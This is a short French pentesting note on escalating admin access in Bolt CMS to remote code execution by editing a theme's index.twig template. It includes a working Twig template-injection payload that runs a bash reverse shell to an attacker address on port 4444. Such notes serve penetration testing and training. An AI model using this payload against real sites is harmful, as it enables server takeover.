RCE

Après vous être connecté en tant qu'administrateur (allez à /bot pour accéder à la fenêtre de connexion), vous pouvez obtenir une RCE dans Bolt CMS :

• Sélectionnez Configuration -> Voir la configuration -> Configuration principale ou allez au chemin d'URL /bolt/file-edit/config?file=/bolt/config.yaml

• Vérifiez la valeur du thème

• Sélectionnez Gestion des fichiers -> Voir et modifier les modèles

• Sélectionnez la base du thème trouvée à l'étape précédente (base-2021 dans ce cas) et sélectionnez index.twig

• Dans mon cas, cela se trouve dans le chemin d'URL /bolt/file-edit/themes?file=/base-2021/index.twig

• Définissez votre charge utile dans ce fichier via injection de modèle (Twig), comme : {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

• Et enregistrez les modifications

• Effacez le cache dans Maintenance -> Effacer le cache

• Accédez à nouveau à la page en tant qu'utilisateur régulier, et la charge utile devrait être exécutée